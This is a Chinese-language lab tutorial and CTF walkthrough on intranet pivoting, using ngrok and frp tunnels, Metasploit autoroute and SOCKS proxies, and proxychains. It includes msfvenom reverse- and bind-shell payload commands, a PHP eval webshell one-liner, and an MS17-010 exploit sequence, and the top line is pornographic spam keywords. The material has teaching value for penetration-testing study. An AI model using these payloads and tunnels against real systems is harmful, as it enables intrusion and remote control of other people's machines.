国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下)

這篇具有很好參考價值的文章主要介紹了70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

? ? ? ? ?70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

這節(jié)課解決代理的問題,

他是內(nèi)網(wǎng)里面的穿透技術(shù),隧道主要安全設(shè)備和流量監(jiān)控的攔截問題,我們在做滲透的時候需要回顯數(shù)據(jù)或者一些重要的信息,走的協(xié)議不一樣,tcp/ip有七層,

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

在不同層里面有不同的協(xié)議,有一些協(xié)議會受到防火墻,過濾設(shè)備和流量檢測工具的干擾,在內(nèi)網(wǎng)回顯數(shù)據(jù)和拖數(shù)據(jù)的會出現(xiàn)一些攔截和告警,隧道技術(shù)主要就是解決這個事情;

兩個肉雞都在內(nèi)網(wǎng),就必須借助代理才能實現(xiàn),代理利用工具比較知名的比如,frp,ngrok,ew,不過ew已經(jīng)停止更新了,以后就用不到了,

代理主要結(jié)局的問題,內(nèi)網(wǎng)里面的主機有外網(wǎng);內(nèi)網(wǎng)里面有過濾;內(nèi)網(wǎng)里面外網(wǎng),單純一個主機服務(wù)器沒有網(wǎng)絡(luò);

必要知識點;

內(nèi)外網(wǎng)絡(luò)劃分,

IPv4地址設(shè)計時保留了一部分作為私有地址,它們不會被當(dāng)作共有地址分配出去,而是只在局域網(wǎng)內(nèi)使用

地址段 ???????????????????????????掩碼

10.x.x.x ?????????????????????????255.0.0.0

172.16.x.x-172.31.x.x????255.240.0.0

192.168.x.x ???????????????????255.255.0.0?

內(nèi)網(wǎng)一和內(nèi)網(wǎng)二通信問題;

主機一在內(nèi)網(wǎng)一這里,主機二就在內(nèi)網(wǎng)二這里,就好比宿舍的上網(wǎng)和工作室上網(wǎng),雖然都在內(nèi)網(wǎng)里面但不是一個內(nèi)網(wǎng),這兩個要實現(xiàn)通訊,比如主機一msf生成一個后門,然后發(fā)給主機二,讓主機二上線,是上不了線的,因為都是內(nèi)網(wǎng),除非使用代理技術(shù);

正向反向協(xié)議通信連接問題

正向就是我去鏈接肉雞,反向就是肉雞主動聯(lián)系我,

內(nèi)網(wǎng)穿透代理隧道技術(shù)說明

隧道主要就是解決防火墻,流量監(jiān)控工具的攔截,代理解決網(wǎng)絡(luò)連通性問題

案例一內(nèi)網(wǎng)穿透Ngrok測試演示-兩個內(nèi)網(wǎng)通訊上線

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

拓撲圖;我們用的是自己的內(nèi)網(wǎng)的虛擬機kali,生成后門,想控制這臺肉雞,理論上不涉及代理是一定控制不了的,因為兩者都是內(nèi)網(wǎng),生成后門的時候如果寫的是外面地址,肉雞連接到時候就找到的路由器,如果寫的內(nèi)網(wǎng)ip,那肉雞根本就找不到,

這就要借助ngrok來實現(xiàn)聯(lián)通;

在使用ngrok的他會在外網(wǎng)啟用一臺服務(wù)器,就會,肉雞在找黑客的時候,肉雞會先找到服務(wù)器,服務(wù)器在傳輸給黑客的主機;這個工具就是在外網(wǎng)加設(shè)一臺服務(wù)器,這個外網(wǎng)服務(wù)器,黑客和肉雞都可以訪問,

內(nèi)網(wǎng)穿透Ngrok測試演示-兩個內(nèi)網(wǎng)通訊上線

http://www.ngrok.cc/

實驗環(huán)境:兩個不同的內(nèi)網(wǎng)(有網(wǎng)絡(luò))實現(xiàn)穿透控制

1.注冊-購買-填寫-確認(rèn)

注冊賬號,根據(jù)操作系統(tǒng)選擇對應(yīng)的客戶端

不會使用可以看使用教程

選“開通隧道”,根據(jù)需要購買服務(wù)器

隧道協(xié)議選擇后門要使用的協(xié)議,注意一下;隨便寫一個名稱和域名

本地端口是攻擊機的地址端口??梢韵入S便寫,后面可以改

如果希望隧道有驗證身份的用戶名和密碼可以填寫驗證用戶名和驗證密碼?

配置好之后在來到隧道代理

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

攻擊機要安裝Ngrok,被攻擊機只需要正常啟動 ,然后先來到下載,復(fù)制到攻擊機,來到它這個目錄

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

運行它,在clinetid后門跟上id

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

開啟成功后,別人訪問這個http的王子,就會指向后面的ip,后面的ip就是黑客主機ip。

現(xiàn)在就可以用msf生成一個后門

msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o

這里選擇的協(xié)議要和建立代理的時候?qū)?yīng),都是http,后門的后門地址就是我們代理的網(wǎng)址,端口也是代理的端口,反彈的shell也會在反彈到代理上面,所有東西就會傳輸?shù)酱砩厦?,代理在傳輸給本機。

然后把生成的后門上傳到肉雞上面

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

之后在本機上面配置好信息,因為開了代理,所有的流量都會執(zhí)行本機ip的4444端口,所以監(jiān)聽ip和端口設(shè)置跟代理傳輸?shù)膇p和端口一致就行

use exploit/multi/handler

????set payload windows/meterpreter/reverse_http

????set lhost 192.168.76.132

????set lport 4444

????Exploit?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

接收到數(shù)據(jù)了,代理也成功傳輸數(shù)據(jù)、

案例二內(nèi)網(wǎng)穿透Frp自建跳板測試-兩個內(nèi)網(wǎng)通訊上線?

目前最主流的工具,用到frp就要自己準(zhǔn)備一臺服務(wù)器,

自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們

1.服務(wù)端-下載-解壓-修改-啟動(阿里云主機記得修改安全組配置出入口)?

下載好之后的所有文件

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

frpc.ini;這個c結(jié)尾的就是客戶端,frps.ini;這個是代表server服務(wù)端,在本機上上就只要修改frpc.ini

控制端修改配置文件frpc.ini:

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

[common]

server_addr = 外網(wǎng)服務(wù)器ip

server_port = 6677?????????#frpc工作端口,必須和frps保持一致

[msf]

type = tcp

local_ip = 127.0.0.1? 本機ip即可

local_port = 5555????????????#轉(zhuǎn)發(fā)給本機的5555端口

remote_port = 6000????????#服務(wù)端用6000端口轉(zhuǎn)發(fā)給本機?

服務(wù)器修改配置文件frps.ini:

[common]

bind_port = 6677????????????#frps工作端口,必須和frpc保持一致

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

啟動服務(wù)端:

????????./frps -c ./frps.ini?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

啟動客戶端

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后在服務(wù)端就成功受到了端口就鏈接

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

生成后門

????msfvenom -p windows/meterpreter/reverse_tcp lhost=[服務(wù)端IP地址]?lport=6000 -f exe -o frp.exe?

把木馬上傳到肉雞上面去執(zhí)行

監(jiān)聽后門

????use exploit/multi/handler

????set payload windows/meterpreter/reverse_tcp

????set LHOST 127.0.0.1

????set LPORT 5555

????exploit?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

沒有問題,管你在那個內(nèi)網(wǎng),老子直接穿透你,

案例三CFS三層內(nèi)網(wǎng)漫游安全測試演練-某CTF線下2019?

內(nèi)網(wǎng)環(huán)境拓撲圖

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

這個題目在每一臺主機里面都有一個flag,這個題目一看就涉及到代理知識,不做跳板沒有辦法進行下去;

第一個靶機

選擇只有那臺外網(wǎng)主機是本機可以訪問到的,實際上情況下就需要端口掃描一下找到,70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

5.0直接用thinkphp滲透工具直接秒他就行了

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

命令執(zhí)行成功,直接寫入一個webshell到網(wǎng)站目錄

echo '<?php eval($_POST[x]);?>'> >/www/wwwroot/ThinkPHP/public/2.php?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后直接用蟻劍鏈接上線,滲透第一個肉雞,

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

第一個flag值拿下

第二個靶機

探針目標(biāo)-利用WEB漏洞(TP5_RCE)-獲取webshell權(quán)限-獲取Flag-Target2

0.端口掃描,發(fā)現(xiàn)目標(biāo)主機。發(fā)現(xiàn)ThinkPHPv5框架,使用對應(yīng)的exp寫入后門?

第二個肉雞有22和33兩個網(wǎng)段,本機連接不了22端口,就必須借助第一個肉雞才能鏈接,用第一臺肉雞去鏈接第二個靶機

1.生成后門:

????msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132 LPORT=1111 -f elf >t1.elf?

先開啟監(jiān)聽狀態(tài)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后通過蟻劍把我們的生成后門上傳到第一個肉雞上命來,之后打開虛擬終端直接執(zhí)行后門70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

接收到了反彈shell

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

接下來該如何讓這個kali可以分為22網(wǎng)段呢,就是第二臺靶機,在msf有自帶的代理加持,

3.信息收集及配置訪問

探索內(nèi)網(wǎng)并添加路由,從而發(fā)現(xiàn)和聯(lián)系上內(nèi)網(wǎng)

獲取網(wǎng)絡(luò)接口:run get_local_subnets

先通過網(wǎng)絡(luò)接口來判斷,在實戰(zhàn)情況下,我們是不會知道第二胎靶機的網(wǎng)絡(luò)的,前期就要進行信息收集,就用到這條命令獲取網(wǎng)卡信息,

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

就可以看到有兩個網(wǎng)卡,22網(wǎng)卡就是內(nèi)網(wǎng)鏈接的,知道了網(wǎng)卡之后,但是不能訪問,這時候就要查看路由,建立路由規(guī)則,

查看路由地址:run autoroute -p

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

空的沒有路由

添加路由地址:run autoroute -s 192.168.22.0/24?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

再查看路由,就多了一個路由地址

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

?然后路由哪里表示了給s1,剛剛反彈的shell是s1的,就是在s1上面多了這個路由,s1上命就有了22網(wǎng)卡,就相當(dāng)于添加了一個網(wǎng)絡(luò)接口,由于是建立到s1,所以就是建立在肉雞一上面的,所以添加路由能成功的原因,就在于是靶機一上面。

通訊成功了接下來就是攻擊,但是這個通訊有點問題,只有在msf能進行通訊,因為路由是寫在msf上面,有一些工具不享有路由規(guī)則,就無法訪問

就只能在msf會話上面攻擊,這時候就需要在本地開一個代理,這個代理就相當(dāng)于,給其他人一個接口,人其他工具去訪問這個接口,在kali上面開一個2222端口,我就可以通過我本機訪問kali的2222端口,本機鏈接kali就能訪問靶機一,而靶機一又可以訪問靶機二,本機和靶機二就通了。

開啟本地代理:

????use auxiliary/server/socks4a

????set srvport 2222

????exploit?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

4.利用本地代理接口訪問測試

linux:

接下來就要用到一個工具proxychains,

配置proxychains后調(diào)用工具探針Target2

/etc/proxychains.conf

????socks4 192.168.76.132 2222

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

????proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 ;接下來用這個工具,調(diào)用nmap掃描22這個網(wǎng)段的時候,就會走192.168.76.132: 2222這個端口,就會享有msf配置的22端口路由,

-Pn:不使用ping掃描,不執(zhí)行主機發(fā)現(xiàn),默認(rèn)目標(biāo)主機是存活的,可以繞開防火墻。

-sT:使用TCP連接,與目標(biāo)三次握手,來確定端口是否開放

開始namp掃描

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

直接掃(target2的網(wǎng)站)192.168.22.129:

然后掃描出來

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后我們直接訪問這個網(wǎng)站是訪問不到的,就可以在瀏覽器哪里開一個代理,在收到配置代理的時候就有一個sosks v4的選項,就是我們本機開的代理70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)+

就能訪問靶機二的web界面

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

由于是ctf在源代碼里面會有一些線索

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

給了一個注入點,

sqlmap和手工注入都可以,注入找到賬號密碼

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

就要開始登陸他的后臺,然后一般網(wǎng)站為了防止爬蟲會把敏感目錄寫道一個rebots文件,剛好這個就用,還有敏感目錄

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

登錄后臺

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

flag就拿到了,但這里是后臺做不了代理,通過后臺一些功能拿webshell70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

根據(jù)網(wǎng)站的路由規(guī)則訪問這個文件:

http://192.168.22.128/index.php?r=special?

寫一個后門,拿下webshell,但是我們怎么去鏈接他也是個問題,不過蟻劍有代理功能,就可以鏈接了

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

拿下webshell,

這里還有一個方法,在windows下可以裝個Proxifier ,這是一個全局代理工具,

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

下面所有應(yīng)用程序都會走這個代理

在windows下可以裝個SocksCap64

給指定程序開啟代理

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后點在代理種運行,這個是避免上面全局代理不支持的軟件,這個全都支持

然后為了拿下第三臺靶機,又要在第二臺肉雞上做操作

這里要在msf生成一個正向后門,這里為什么要做正向代理,因為第二胎肉雞,他沒有76網(wǎng)段,只有22和33網(wǎng)段,寫成反向代理,第二臺肉雞找不到kali;但是kali已經(jīng)按到了第一臺肉雞的權(quán)限啊,有他shell在,還添加了22的路由,在第二臺肉雞可以添加路由嗎?不可能,路由只能在是讓肉雞上線才能操作,這上線都沒有上線,操作個雞毛,所以只能kali自己去鏈接第二臺肉雞

1.生成正向后門:

????msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf?

bind綁定,這個后門會綁定在他本地的3333端口,

生成后門文件之后之后,利用蟻劍把后門文件上傳到第二臺肉雞,

2.訪問接受:

????use exploit/multi/handler

????set payload linux/x64/meterpreter/bind_tcp

????set rhost 192.168.22.128

????set LPORT 3333

????exploit?

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

開啟監(jiān)聽

用蟻劍執(zhí)行后門文件

第三臺肉雞

就拿到了反彈shell,添加33網(wǎng)段路由

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

然后就是和上面一樣的操作,在在本地開一個代理,讓別人軟件可以通過這個代理去訪問第三胎肉雞的33網(wǎng)段上面的東西,

漏洞利用,找到flag

????proxychains4 nmap -Pn -sT 192.168.33.33

利用本地代理執(zhí)行nmap掃描,加上參數(shù)--script=all? 掃描windows的系統(tǒng)漏洞

掃出來一個ms17010,永恒之藍漏洞

????use exploit/windows/smb/ms17_010_psexec

????set payload windows/meterpreter/bind_tcp

因為第三臺肉雞無法主動找我,只能我去找他,所以paylaod還是綁定

????set RHOST 192.168.33.33

設(shè)置肉雞的ip

????exploit

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

這里老師鏈接上了本地代理,別的東西都通過本地代理訪問的第三臺肉雞,設(shè)置好本地代理才能繼續(xù)下去,拿下第三個肉雞

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下),安全,網(wǎng)絡(luò)

????dir /S flag.txt /B

????type xxxxx.txt?

完成

? ?

fa

cai文章來源地址http://www.zghlxwxcb.cn/news/detail-776744.html

到了這里,關(guān)于70內(nèi)網(wǎng)安全-域橫向內(nèi)網(wǎng)漫游Socks代理隧道技術(shù)(下)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • 內(nèi)網(wǎng)隧道代理技術(shù)(十一)之公網(wǎng)資產(chǎn)掃描-代理池配置

    內(nèi)網(wǎng)隧道代理技術(shù)(十一)之公網(wǎng)資產(chǎn)掃描-代理池配置

    代理池的意思就是擁有多個代理可以隨意切換IP的東西,每次用戶的請求通過代理池,每個請求包的IP地址是不同的,那么代理池一般有幾種用法呢? 購買代理池,購買的東西會自動切換IP,簡單又方便(大力推薦) 有些工具可以支持文本代理的方式,就是將很多單個IP代理放

    2024年02月13日
    瀏覽(19)
  • 內(nèi)網(wǎng)隧道代理技術(shù)(十五)之 Earthworm的使用(二級代理)

    內(nèi)網(wǎng)隧道代理技術(shù)(十五)之 Earthworm的使用(二級代理)

    本文緊接著上一篇文章繼續(xù)講解Earthworm工具的使用 二級正向代理發(fā)生在如下的情況: 1、Web服務(wù)器在公網(wǎng),黑客可以直接訪問 2、B機器在內(nèi)網(wǎng),黑客不能直接訪問 3、Web服務(wù)器可以訪問內(nèi)網(wǎng)機器B 4、內(nèi)網(wǎng)機器B可以訪問公司內(nèi)部機器 在這種情況下我們可以使用(二級代理)正向

    2024年02月14日
    瀏覽(16)
  • 內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    內(nèi)網(wǎng)安全-代理Socks協(xié)議&CS-MSF控制上線

    目錄 實驗前提 實驗環(huán)境 實驗?zāi)繕?biāo) 環(huán)境部署 實驗1 msf通信win10的56網(wǎng)段與正向連接? msf通信win10 msf上線win10 實驗2?cs通信win10的56網(wǎng)段與正向連接 cs通信win10 cs上線win10 ? 實驗環(huán)境 本地計算機存在一個36網(wǎng)段可以與win7ping通并且可以上網(wǎng)。 win7存在36和52網(wǎng)段,可以與本地和win10p

    2024年02月16日
    瀏覽(23)
  • 內(nèi)網(wǎng)隧道代理技術(shù)(二十一)之 CS工具自帶中轉(zhuǎn)技術(shù)上線不出網(wǎng)機器

    內(nèi)網(wǎng)隧道代理技術(shù)(二十一)之 CS工具自帶中轉(zhuǎn)技術(shù)上線不出網(wǎng)機器

    如圖A區(qū)域存在一臺中轉(zhuǎn)機器,這臺機器可以出網(wǎng),這種是最常見的情況。我們在滲透測試的過程中經(jīng)常是拿下一臺邊緣機器,其有多塊網(wǎng)卡,邊緣機器可以訪問內(nèi)網(wǎng)機器,內(nèi)網(wǎng)機器都不出網(wǎng)。這種情況下拿這個邊緣機器做中轉(zhuǎn),就可以使用CS工具自帶上線不出網(wǎng)機器 網(wǎng)絡(luò)拓撲

    2024年02月10日
    瀏覽(24)
  • 內(nèi)網(wǎng)安全:初探隧道技術(shù)

    內(nèi)網(wǎng)安全:初探隧道技術(shù)

    目錄 防火墻必備知識 域控-防火墻組策略對象同步 域控 - 防火墻組策略不出網(wǎng)上線 MSF上線 CS - ICMP上線 注意:隧道技術(shù)是后滲透手段,是在已經(jīng)取得權(quán)限后的手段 域控-組策略同步 學(xué)習(xí)防火墻的目標(biāo)是知道了解防火墻的一些常見配置對內(nèi)網(wǎng)滲透的影響,并不需要像運維一樣全

    2024年02月07日
    瀏覽(16)
  • 內(nèi)網(wǎng)安全:隧道技術(shù)詳解

    內(nèi)網(wǎng)安全:隧道技術(shù)詳解

    目錄 隧道技術(shù) 反向連接技術(shù) 反向連接實驗所用網(wǎng)絡(luò)拓撲圖及說明 網(wǎng)絡(luò)說明 防火墻限制說明 實驗前提說明 實戰(zhàn)一:CS反向連接上線 - 拿下Win2008 一. 使用轉(zhuǎn)發(fā)代理上線創(chuàng)建監(jiān)聽器 二. 上傳后門執(zhí)行上線 隧道技術(shù) - SMB協(xié)議 SMB協(xié)議介紹 實戰(zhàn)二:SMB協(xié)議搭建隧道 正向連接 - 拿下

    2024年02月08日
    瀏覽(19)
  • 內(nèi)網(wǎng)安全:隧道技術(shù)詳解_第125天:內(nèi)網(wǎng)安全-隧道技術(shù)&smb&icmp&正反向連接&防火墻出入規(guī)則上線

    內(nèi)網(wǎng)安全:隧道技術(shù)詳解_第125天:內(nèi)網(wǎng)安全-隧道技術(shù)&smb&icmp&正反向連接&防火墻出入規(guī)則上線

    目錄 隧道技術(shù) 反向連接技術(shù) 反向連接實驗所用網(wǎng)絡(luò)拓撲圖及說明 網(wǎng)絡(luò)說明 防火墻限制說明 實驗前提說明 實戰(zhàn)一:CS反向連接上線 - 拿下Win2008 一. 使用轉(zhuǎn)發(fā)代理上線創(chuàng)建監(jiān)聽器 二. 上傳后門執(zhí)行上線 隧道技術(shù) - SMB協(xié)議 SMB協(xié)議介紹 實戰(zhàn)二:SMB協(xié)議搭建隧道 正向連接 - 拿下

    2024年02月22日
    瀏覽(46)
  • 深入探索代理技術(shù):Socks5、IP代理與網(wǎng)絡(luò)安全

    Socks5代理:高度靈活的網(wǎng)絡(luò)中轉(zhuǎn)站 Socks5代理是一種網(wǎng)絡(luò)協(xié)議,允許客戶端與服務(wù)器進行通信,通過代理服務(wù)器中轉(zhuǎn)數(shù)據(jù),起到隱蔽客戶端身份的作用。相比于Socks4,Socks5不僅支持TCP連接,還支持UDP連接,使其在實時數(shù)據(jù)傳輸場景中更具優(yōu)勢。不過,提到\\\"SK5\\\"代理,實際上是沒

    2024年02月12日
    瀏覽(28)
  • Socks5、網(wǎng)絡(luò)安全、代理IP技術(shù)詳解

    ? ? 隨著互聯(lián)網(wǎng)的發(fā)展,網(wǎng)絡(luò)安全問題越來越受到人們的關(guān)注。為了保護個人隱私和網(wǎng)絡(luò)安全,使用代理服務(wù)器成為了一種普遍的選擇。其中,Socks5協(xié)議是一種常見的代理協(xié)議,而代理IP是使用代理服務(wù)器時經(jīng)常需要考慮的問題。本文將深入探討Socks5、網(wǎng)絡(luò)安全、代理IP等技術(shù)

    2024年02月07日
    瀏覽(22)
  • SSH隧道動態(tài)轉(zhuǎn)發(fā)端口實現(xiàn)SOCKS代理 + HTTP代理(Privoxy)

    SSH隧道動態(tài)轉(zhuǎn)發(fā)端口實現(xiàn)SOCKS代理 + HTTP代理(Privoxy)

    實現(xiàn)效果 :ssh連接遠程服務(wù)器進行網(wǎng)絡(luò)轉(zhuǎn)發(fā),本地服務(wù)連接網(wǎng)絡(luò)代理 環(huán)境 :windows11/10 需要工具 :MobaXterm(ssh隧道端口轉(zhuǎn)發(fā)),Privoxy(socks轉(zhuǎn)http代理),一個云服務(wù)器 多種方法選一種即可:? 命令行: ssh -C -N -D LOCAL_ADDRESS:LOCAL_PORT USER@REMOTE_ADDRESS Putty客戶端 MobaXteam中的 Mo

    2023年04月09日
    瀏覽(25)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包